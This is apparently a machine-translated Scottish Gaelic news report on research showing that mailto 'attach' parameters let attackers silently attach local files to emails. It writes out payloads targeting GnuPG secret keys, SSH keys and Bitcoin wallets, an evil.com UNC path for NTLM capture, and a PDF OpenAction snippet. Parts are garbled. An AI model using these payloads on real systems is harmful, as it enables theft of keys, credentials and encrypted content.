Luchd-rannsachaidh bho Oilthigh Ruhr Bochum (A’ Ghearmailt) () giùlan teachdaichean puist nuair a bhios iad a’ giullachd cheanglaichean “mailto:" le paramadairean adhartach. Bha còignear den fhichead teachdaiche post-d a chaidh a sgrùdadh so-leònte ri ionnsaigh a bha a’ làimhseachadh ionadachadh ghoireasan a’ cleachdadh am paramadair “ceangal”. Bha sia teachdaichean puist-d a bharrachd ann an cunnart bho ionnsaigh ath-nuadhachaidh iuchair PGP agus S/MIME, agus bha triùir luchd-dèiligidh so-leònte gu ionnsaigh gus susbaint teachdaireachdan crioptaichte a thoirt a-mach.
Ceanglaichean «“air an cleachdadh gus fosgladh teachdaiche post-d a dhèanamh fèin-ghluasadach gus litir a sgrìobhadh chun neach a tha air a shònrachadh sa cheangal. A bharrachd air an t-seòladh, faodaidh tu crìochan a bharrachd a shònrachadh mar phàirt den cheangal, leithid cuspair na litreach agus teamplaid airson susbaint àbhaisteach. Bidh an ionnsaigh a thathar a’ moladh a’ làimhseachadh am paramadair “ceangal”, a leigeas leat ceangal a cheangal ris an teachdaireachd a chaidh a chruthachadh.
Bha teachdaichean puist Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM / HCL Notes (CVE-2020-4089) agus Pegasus Mail ann an cunnart bho ionnsaigh bheag a leigeas leat ceangal a dhèanamh gu fèin-ghluasadach. faidhle ionadail sam bith, air a shònrachadh tro cheangal mar “mailto:?attach=path_to_file”. Tha am faidhle ceangailte gun rabhadh a thaisbeanadh, agus mar sin gun aire shònraichte, is dòcha nach mothaich an neach-cleachdaidh gun tèid an litir a chuir le ceangal.
Mar eisimpleir, a’ cleachdadh ceangal mar “mailto:[post-d fo dhìon]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg"'s urrainn dhut iuchraichean prìobhaideach o GnuPG a chur a-steach dhan litir. Faodaidh tu cuideachd susbaint wallets crypto (~/.bitcoin/wallet.dat), iuchraichean SSH (~/.ssh/id_rsa) agus faidhlichean sam bith a tha ruigsinneach don neach-cleachdaidh a chuir. A bharrachd air an sin, leigidh Thunderbird leat buidhnean de fhaidhlichean a cheangal le masg a’ cleachdadh structaran mar “attach=/tmp/*.txt”.
A bharrachd air faidhlichean ionadail, bidh cuid de luchd-dèiligidh post-d a’ giullachd cheanglaichean ri stòradh lìonra agus slighean san t-seirbheisiche IMAP. Gu sònraichte, leigidh IBM Notes leat faidhle a ghluasad bho eòlaire lìonra nuair a bhios tu a’ giullachd cheanglaichean mar “attach=\\evil.com\dummyfile”, a bharrachd air eadar-ghearradh paramadairean dearbhaidh NTLM le bhith a’ cur ceangal gu frithealaiche SMB fo smachd an neach-ionnsaigh. (thèid an t-iarrtas a chuir leis a’ chleachdaiche paramadairean dearbhaidh gnàthach).
Bidh Thunderbird gu soirbheachail a’ pròiseasadh iarrtasan mar “attach=imap:///fetch>UID>/INBOX>1/”, a leigeas leat susbaint a cheangal bho phasganan air an fhrithealaiche IMAP. Aig an aon àm, bidh teachdaireachdan a gheibhear air ais bho IMAP, air an crioptachadh tro OpenPGP agus S/MIME, air an dì-chrioptachadh gu fèin-ghluasadach leis a’ chleachdaiche puist mus tèid an cur. Bha an luchd-leasachaidh aig Thunderbird mun duilgheadas sa Ghearran agus anns a 'chùis tha an duilgheadas air a rèiteachadh mar-thà (tha meuran Thunderbird 52, 60 agus 68 fhathast so-leònte).
Bha seann dreachan de Thunderbird cuideachd ann an cunnart bho dhà dhreach ionnsaigh eile air PGP agus S/MIME a mhol an luchd-rannsachaidh. Gu sònraichte, bha Thunderbird, a bharrachd air OutLook, PostBox, eM Client, MailMate agus R2Mail2, fo smachd prìomh ionnsaigh ùr, air adhbhrachadh leis gu bheil teachdaiche a’ phuist gu fèin-ghluasadach a’ toirt a-steach agus a’ stàladh theisteanasan ùra air an sgaoileadh ann am teachdaireachdan S/MIME, a leigeas le an neach-ionnsaigh gus iuchraichean poblach a chuir an àite an neach-cleachdaidh a chuir an àite mar-thà.
Bidh an dàrna ionnsaigh, ris a bheil Thunderbird, PostBox agus MailMate buailteach, a’ làimhseachadh feartan an uidheamachd airson dreachd theachdaireachdan a shàbhaladh gu fèin-ghluasadach agus a’ ceadachadh, a’ cleachdadh paramadairean mailto, gus teachdaireachdan crioptaichte a dhì-chrioptachadh no cuir a-steach ainm-sgrìobhte didseatach airson teachdaireachdan neo-riaghailteach, le tar-chuir an toradh às deidh sin gu frithealaiche IMAP an neach-ionnsaigh. Anns an ionnsaigh seo, tha an ciphertext air a ghluasad tron pharamadair “corp”, agus tha an taga “meta refresh” air a chleachdadh gus fios a chuir gu frithealaiche IMAP an neach-ionnsaigh. Mar eisimpleir: ' '
Gus ceanglaichean “mailto:" a phròiseasadh gu fèin-ghluasadach às aonais eadar-obrachadh luchd-cleachdaidh, faodar sgrìobhainnean PDF a chaidh an dealbhadh gu sònraichte a chleachdadh - leigidh an gnìomh OpenAction ann am PDF dhut an inneal-làimhseachaidh mailto a chuir air bhog gu fèin-ghluasadach nuair a dh’ fhosglas tu sgrìobhainn:
% PDF-1.5
1 0 oib
<< /Seòrsa /Catalog /OpenAction [2 0 R] >>
endobj
2 0 oib
<< / Seòrsa / Gnìomh /S / URI/URI (mailto:?body=—— TÒRR TEACHD PGP ——[…]) >>
endobj
Source: fosgailtenet.ru